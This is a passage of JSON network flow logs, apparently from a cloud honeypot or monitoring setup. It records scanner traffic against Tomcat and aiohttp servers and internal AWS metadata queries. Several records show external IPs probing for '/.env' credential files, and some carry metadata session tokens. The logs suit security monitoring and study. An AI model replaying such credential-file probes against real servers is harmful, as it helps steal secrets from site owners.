","dest_headers":"HTTP/1.1 404 \r\nContent-Type: text/html;charset=utf-8\r\nContent-Language: en\r\nContent-Length: 1093\r\nDate: Wed, 06 Apr 2022 08:01:54 GMT\r\nConnection: close\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":1093,"flow_id":"091e19f6-7e74-4981-aea8-6be003ec41d4","http_comment":"HTTP/1.1 404 ","http_content_length":1093,"http_content_type":"text/html;charset=utf-8","http_method":"GET","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /robots.txt HTTP/1.1","site":"54.218.192.0:8080","src_headers":"GET /robots.txt HTTP/1.1\r\nHost: 54.218.192.0:8080\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE\r\nAccept: */*\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n","src_ip":"183.136.225.9","src_mac":"02:A5:92:DA:49:85","src_port":11515,"status":404,"time_taken":202583,"transport":"tcp","uri":"/robots.txt","uri_path":"/robots.txt"} {"endtime":"2022-04-06T08:01:53.848259Z","timestamp":"2022-04-06T08:01:53.846495Z","bytes":1493,"bytes_in":243,"bytes_out":1250,"dest_content":"HTTP Status 404 – Not Found

HTTP Status 404 – Not Found


Type Status Report

Message /favicon.ico

Description The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.


Apache Tomcat/9.0.16 (Ubuntu)

","dest_headers":"HTTP/1.1 404 \r\nContent-Type: text/html;charset=utf-8\r\nContent-Language: en\r\nContent-Length: 1094\r\nDate: Wed, 06 Apr 2022 08:01:53 GMT\r\nConnection: close\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":1094,"flow_id":"71e66818-18ee-4f9f-8d33-1bd7ac15db85","http_comment":"HTTP/1.1 404 ","http_content_length":1094,"http_content_type":"text/html;charset=utf-8","http_method":"GET","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /favicon.ico HTTP/1.1","site":"54.218.192.0:8080","src_headers":"GET /favicon.ico HTTP/1.1\r\nHost: 54.218.192.0:8080\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE\r\nAccept: */*\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n","src_ip":"183.136.225.9","src_mac":"02:A5:92:DA:49:85","src_port":10841,"status":404,"time_taken":198828,"transport":"tcp","uri":"/favicon.ico","uri_path":"/favicon.ico"} {"endtime":"2022-04-06T08:01:53.430884Z","timestamp":"2022-04-06T08:01:53.429771Z","bytes":2345,"bytes_in":232,"bytes_out":2113,"dest_content":"\n\n\n\n Apache Tomcat\n\n\n\n

It works !

\n\n

If you're seeing this page via a web browser, it means you've setup Tomcat successfully. Congratulations!

\n \n

This is the default Tomcat home page. It can be found on the local filesystem at: /var/lib/tomcat9/webapps/ROOT/index.html

\n\n

Tomcat veterans might be pleased to learn that this system instance of Tomcat is installed with CATALINA_HOME in /usr/share/tomcat9 and CATALINA_BASE in /var/lib/tomcat9, following the rules from /usr/share/doc/tomcat9-common/RUNNING.txt.gz.

\n\n

You might consider installing the following packages, if you haven't already done so:

\n\n

tomcat9-docs: This package installs a web application that allows to browse the Tomcat 9 documentation locally. Once installed, you can access it by clicking here.

\n\n

tomcat9-examples: This package installs a web application that allows to access the Tomcat 9 Servlet and JSP examples. Once installed, you can access it by clicking here.

\n\n

tomcat9-admin: This package installs two web applications that can help managing this Tomcat instance. Once installed, you can access the manager webapp and the host-manager webapp.

\n\n

NOTE: For security reasons, using the manager webapp is restricted to users with role \"manager-gui\". The host-manager webapp is restricted to users with role \"admin-gui\". Users are defined in /etc/tomcat9/tomcat-users.xml.

\n\n\n\n","dest_headers":"HTTP/1.1 200 \r\nAccept-Ranges: bytes\r\nETag: W/\"1895-1649171235548\"\r\nLast-Modified: Tue, 05 Apr 2022 15:07:15 GMT\r\nContent-Type: text/html\r\nContent-Length: 1895\r\nDate: Wed, 06 Apr 2022 08:01:53 GMT\r\nConnection: close\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":1895,"flow_id":"856724c0-5c12-4cbb-8071-e11630bd9e16","http_comment":"HTTP/1.1 200 ","http_content_length":1895,"http_content_type":"text/html","http_method":"GET","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","site":"54.218.192.0:8080","src_headers":"GET / HTTP/1.1\r\nHost: 54.218.192.0:8080\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE\r\nAccept: */*\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n","src_ip":"183.136.225.9","src_mac":"02:A5:92:DA:49:85","src_port":10677,"status":200,"time_taken":184888,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T08:01:53.003890Z","timestamp":"2022-04-06T08:01:53.002127Z","bytes":2270,"bytes_in":176,"bytes_out":2094,"dest_content":"\n\n\n\n Apache Tomcat\n\n\n\n

It works !

\n\n

If you're seeing this page via a web browser, it means you've setup Tomcat successfully. Congratulations!

\n \n

This is the default Tomcat home page. It can be found on the local filesystem at: /var/lib/tomcat9/webapps/ROOT/index.html

\n\n

Tomcat veterans might be pleased to learn that this system instance of Tomcat is installed with CATALINA_HOME in /usr/share/tomcat9 and CATALINA_BASE in /var/lib/tomcat9, following the rules from /usr/share/doc/tomcat9-common/RUNNING.txt.gz.

\n\n

You might consider installing the following packages, if you haven't already done so:

\n\n

tomcat9-docs: This package installs a web application that allows to browse the Tomcat 9 documentation locally. Once installed, you can access it by clicking here.

\n\n

tomcat9-examples: This package installs a web application that allows to access the Tomcat 9 Servlet and JSP examples. Once installed, you can access it by clicking here.

\n\n

tomcat9-admin: This package installs two web applications that can help managing this Tomcat instance. Once installed, you can access the manager webapp and the host-manager webapp.

\n\n

NOTE: For security reasons, using the manager webapp is restricted to users with role \"manager-gui\". The host-manager webapp is restricted to users with role \"admin-gui\". Users are defined in /etc/tomcat9/tomcat-users.xml.

\n\n\n\n","dest_headers":"HTTP/1.1 200 \r\nAccept-Ranges: bytes\r\nETag: W/\"1895-1649171235548\"\r\nLast-Modified: Tue, 05 Apr 2022 15:07:15 GMT\r\nContent-Type: text/html\r\nContent-Length: 1895\r\nDate: Wed, 06 Apr 2022 08:01:53 GMT\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":1895,"flow_id":"cec200b4-43e7-4b5c-a0af-2a389849a731","http_comment":"HTTP/1.1 200 ","http_content_length":1895,"http_content_type":"text/html","http_method":"GET","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","site":"54.218.192.0:8080","src_headers":"GET / HTTP/1.1\r\nHost: 54.218.192.0:8080\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n","src_ip":"183.136.225.9","src_mac":"02:A5:92:DA:49:85","src_port":10281,"status":200,"time_taken":177406,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T07:26:53.464546Z","timestamp":"2022-04-06T07:26:53.463299Z","bytes":2208,"bytes_in":114,"bytes_out":2094,"dest_content":"\n\n\n\n Apache Tomcat\n\n\n\n

It works !

\n\n

If you're seeing this page via a web browser, it means you've setup Tomcat successfully. Congratulations!

\n \n

This is the default Tomcat home page. It can be found on the local filesystem at: /var/lib/tomcat9/webapps/ROOT/index.html

\n\n

Tomcat veterans might be pleased to learn that this system instance of Tomcat is installed with CATALINA_HOME in /usr/share/tomcat9 and CATALINA_BASE in /var/lib/tomcat9, following the rules from /usr/share/doc/tomcat9-common/RUNNING.txt.gz.

\n\n

You might consider installing the following packages, if you haven't already done so:

\n\n

tomcat9-docs: This package installs a web application that allows to browse the Tomcat 9 documentation locally. Once installed, you can access it by clicking here.

\n\n

tomcat9-examples: This package installs a web application that allows to access the Tomcat 9 Servlet and JSP examples. Once installed, you can access it by clicking here.

\n\n

tomcat9-admin: This package installs two web applications that can help managing this Tomcat instance. Once installed, you can access the manager webapp and the host-manager webapp.

\n\n

NOTE: For security reasons, using the manager webapp is restricted to users with role \"manager-gui\". The host-manager webapp is restricted to users with role \"admin-gui\". Users are defined in /etc/tomcat9/tomcat-users.xml.

\n\n\n\n","dest_headers":"HTTP/1.1 200 \r\nAccept-Ranges: bytes\r\nETag: W/\"1895-1649171235548\"\r\nLast-Modified: Tue, 05 Apr 2022 15:07:15 GMT\r\nContent-Type: text/html\r\nContent-Length: 1895\r\nDate: Wed, 06 Apr 2022 07:26:53 GMT\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":1895,"flow_id":"9003bb32-d373-49ff-9a2c-74c07bf14288","http_comment":"HTTP/1.1 200 ","http_content_length":1895,"http_content_type":"text/html","http_method":"GET","http_user_agent":"Mozilla/5.0 zgrab/0.x","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","site":"54.218.192.0:8080","src_headers":"GET / HTTP/1.1\r\nHost: 54.218.192.0:8080\r\nUser-Agent: Mozilla/5.0 zgrab/0.x\r\nAccept: */*\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"192.241.199.252","src_mac":"02:A5:92:DA:49:85","src_port":45900,"status":200,"time_taken":21728,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T07:22:38.547433Z","timestamp":"2022-04-06T07:22:38.547433Z","bytes":163,"bytes_in":163,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"867eec6d-f4fa-4bbf-8096-4e81afb56b9b","http_method":"GET","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","site":"35.84.123.246","src_headers":"GET / HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36\r\nHost: 35.84.123.246\r\n\r\n","src_ip":"162.243.39.32","src_mac":"02:A5:92:DA:49:85","src_port":32916,"time_taken":0,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T07:22:38.398790Z","timestamp":"2022-04-06T07:22:38.398790Z","bytes":163,"bytes_in":163,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"867eec6d-f4fa-4bbf-8096-4e81afb56b9b","http_method":"GET","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","site":"35.84.123.246","src_headers":"GET / HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36\r\nHost: 35.84.123.246\r\n\r\n","src_ip":"162.243.39.32","src_mac":"02:A5:92:DA:49:85","src_port":32916,"time_taken":74340,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T07:16:18.493220Z","timestamp":"2022-04-06T07:16:18.492531Z","bytes":1724,"bytes_in":164,"bytes_out":1560,"dest_content":"\n Login | Access\n\t\n\t\n\t\n\t\n\n\n\t
\n\t\t
\n\t\t\t
\n\t\t\t\t
\n\t\t\t\t
\n\t\t\t\t\t
\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t
\n\n\t\t\t\t\t
\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t
\n\n\t\t\t\t\t\n\t\t\t\t
\n\t\t\t
\n\t\t
\n\t
\n\t\n\t\n\n","dest_headers":"HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\nContent-Length: 1408\r\nDate: Wed, 06 Apr 2022 07:16:18 GMT\r\nServer: Python/3.6 aiohttp/3.6.2\r\n\r\n","dest_ip":"10.0.1.12","dest_mac":"02:3E:49:33:B8:B5","dest_port":8888,"file_size":1408,"flow_id":"b6347d80-b453-40c2-a0cf-8714e7728ecb","http_comment":"HTTP/1.1 200 OK","http_content_length":1408,"http_content_type":"text/html; charset=utf-8","http_method":"GET","http_user_agent":"Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","server":"Python/3.6 aiohttp/3.6.2","site":"54.189.97.219:8888","src_headers":"GET / HTTP/1.1\r\nHost: 54.189.97.219:8888\r\nUser-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)\r\nAccept: */*\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"167.94.146.58","src_mac":"02:A5:92:DA:49:85","src_port":42272,"status":200,"time_taken":163934,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T07:16:18.153976Z","timestamp":"2022-04-06T07:16:18.153154Z","bytes":1604,"bytes_in":44,"bytes_out":1560,"dest_content":"\n Login | Access\n\t\n\t\n\t\n\t\n\n\n\t
\n\t\t
\n\t\t\t
\n\t\t\t\t
\n\t\t\t\t
\n\t\t\t\t\t
\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t
\n\n\t\t\t\t\t
\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t
\n\n\t\t\t\t\t\n\t\t\t\t
\n\t\t\t
\n\t\t
\n\t
\n\t\n\t\n\n","dest_headers":"HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\nContent-Length: 1408\r\nDate: Wed, 06 Apr 2022 07:16:18 GMT\r\nServer: Python/3.6 aiohttp/3.6.2\r\n\r\n","dest_ip":"10.0.1.12","dest_mac":"02:3E:49:33:B8:B5","dest_port":8888,"file_size":1408,"flow_id":"c9a8db85-d9c8-4010-83e8-926af619ae42","http_comment":"HTTP/1.1 200 OK","http_content_length":1408,"http_content_type":"text/html; charset=utf-8","http_method":"GET","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","server":"Python/3.6 aiohttp/3.6.2","site":"54.189.97.219:8888","src_headers":"GET / HTTP/1.1\r\nHost: 54.189.97.219:8888\r\n\r\n","src_ip":"167.94.146.58","src_mac":"02:A5:92:DA:49:85","src_port":60904,"status":200,"time_taken":165780,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T07:11:42.452855Z","timestamp":"2022-04-06T07:11:42.452659Z","bytes":773,"bytes_in":246,"bytes_out":527,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 10800\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 07:11:42 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"fc461ce8-53b9-4284-a7de-2339d2c4ffc7","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAB12_4PBJX-o-ftn-_f9xIVD_faETOwzsl8VDycCsRSP6rxrdw==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":37222,"status":404,"time_taken":203,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T07:11:42.452271Z","timestamp":"2022-04-06T07:11:42.451810Z","bytes":497,"bytes_in":236,"bytes_out":261,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 10800\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 06:26:03 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 07:11:42 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"0eab6cbb-b6f6-4fa9-8530-8555c4cf2777","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAB12_4PLkzzLMnWW7D_TYFoPfLWUWPa1EHDLmlPWnb2nn366jA==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":37220,"status":200,"time_taken":476,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T07:02:06.083827Z","timestamp":"2022-04-06T07:02:06.083626Z","bytes":772,"bytes_in":246,"bytes_out":526,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 7200\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 07:02:06 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"885356a9-7481-4209-87b9-979449dc6add","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAKgN4ZhrrQ8W5dCXyKL9CaTPJUz7Gz0ab15Cxxjp9XhejBZXBQ==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.12","src_mac":"02:3E:49:33:B8:B5","src_port":37548,"status":404,"time_taken":211,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T07:02:06.083106Z","timestamp":"2022-04-06T07:02:06.082832Z","bytes":496,"bytes_in":236,"bytes_out":260,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 7200\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 06:54:58 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 07:02:06 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"2fc02540-b13c-4c51-aa04-83ae03e835f2","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAKgN4ZgoDIVBfMqbdCFJhTJHdyR-Sy3U3VUTV3n4MesvAPsm3Q==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.12","src_mac":"02:3E:49:33:B8:B5","src_port":37546,"status":200,"time_taken":306,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T07:01:59.874817Z","timestamp":"2022-04-06T07:01:59.874606Z","bytes":772,"bytes_in":246,"bytes_out":526,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 7200\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 07:01:59 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"87d61b19-8791-4bac-9270-c9f3843e464f","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAJiiicNb_rLsJH_e_wM2WDqJ6Kb_uTmcoC48PP6o6p7tyUHP9g==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.20","src_mac":"02:9E:53:65:4C:5F","src_port":42972,"status":404,"time_taken":255,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T07:01:59.873060Z","timestamp":"2022-04-06T07:01:59.872748Z","bytes":496,"bytes_in":236,"bytes_out":260,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 7200\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 06:32:27 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 07:01:59 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"6309e17f-c52a-4e5e-9ffc-fc989c1aff69","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAJiiicOYLK24xTS3vdnCjFNF_QWAxJ9U3Vj2pnP7D-_zNg5jXQ==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.20","src_mac":"02:9E:53:65:4C:5F","src_port":42970,"status":200,"time_taken":349,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T06:59:26.719775Z","timestamp":"2022-04-06T06:59:26.719775Z","bytes":231,"bytes_in":231,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"fbedb993-e801-402a-a72a-e33108cdc64d","http_method":"GET","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36","protocol_stack":"ip:tcp:http","request":"GET /.env HTTP/1.1","site":"35.84.123.246","src_headers":"GET /.env HTTP/1.1\r\nHost: 35.84.123.246\r\nUser-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n","src_ip":"185.254.196.115","src_mac":"02:A5:92:DA:49:85","src_port":38404,"time_taken":172231,"transport":"tcp","uri":"/.env","uri_path":"/.env"} {"endtime":"2022-04-06T06:51:57.034491Z","timestamp":"2022-04-06T06:51:57.033229Z","bytes":2277,"bytes_in":164,"bytes_out":2113,"dest_content":"\n\n\n\n Apache Tomcat\n\n\n\n

It works !

\n\n

If you're seeing this page via a web browser, it means you've setup Tomcat successfully. Congratulations!

\n \n

This is the default Tomcat home page. It can be found on the local filesystem at: /var/lib/tomcat9/webapps/ROOT/index.html

\n\n

Tomcat veterans might be pleased to learn that this system instance of Tomcat is installed with CATALINA_HOME in /usr/share/tomcat9 and CATALINA_BASE in /var/lib/tomcat9, following the rules from /usr/share/doc/tomcat9-common/RUNNING.txt.gz.

\n\n

You might consider installing the following packages, if you haven't already done so:

\n\n

tomcat9-docs: This package installs a web application that allows to browse the Tomcat 9 documentation locally. Once installed, you can access it by clicking here.

\n\n

tomcat9-examples: This package installs a web application that allows to access the Tomcat 9 Servlet and JSP examples. Once installed, you can access it by clicking here.

\n\n

tomcat9-admin: This package installs two web applications that can help managing this Tomcat instance. Once installed, you can access the manager webapp and the host-manager webapp.

\n\n

NOTE: For security reasons, using the manager webapp is restricted to users with role \"manager-gui\". The host-manager webapp is restricted to users with role \"admin-gui\". Users are defined in /etc/tomcat9/tomcat-users.xml.

\n\n\n\n","dest_headers":"HTTP/1.1 200 \r\nAccept-Ranges: bytes\r\nETag: W/\"1895-1649171235548\"\r\nLast-Modified: Tue, 05 Apr 2022 15:07:15 GMT\r\nContent-Type: text/html\r\nContent-Length: 1895\r\nDate: Wed, 06 Apr 2022 06:51:57 GMT\r\nConnection: close\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":1895,"flow_id":"a5e0edf8-7328-4883-adc5-bb2f42c59b77","http_comment":"HTTP/1.1 200 ","http_content_length":1895,"http_content_type":"text/html","http_method":"GET","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.0","src_headers":"GET / HTTP/1.0\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30\r\nAccept: */*\r\n\r\n","src_ip":"46.174.191.30","src_mac":"02:A5:92:DA:49:85","src_port":38364,"status":200,"time_taken":285856,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T06:41:30.481571Z","timestamp":"2022-04-06T06:41:30.481571Z","bytes":231,"bytes_in":231,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"ca2d8779-78fd-471a-a7f7-9e50332550b7","http_method":"GET","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36","protocol_stack":"ip:tcp:http","request":"GET /.env HTTP/1.1","site":"35.84.123.246","src_headers":"GET /.env HTTP/1.1\r\nHost: 35.84.123.246\r\nUser-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 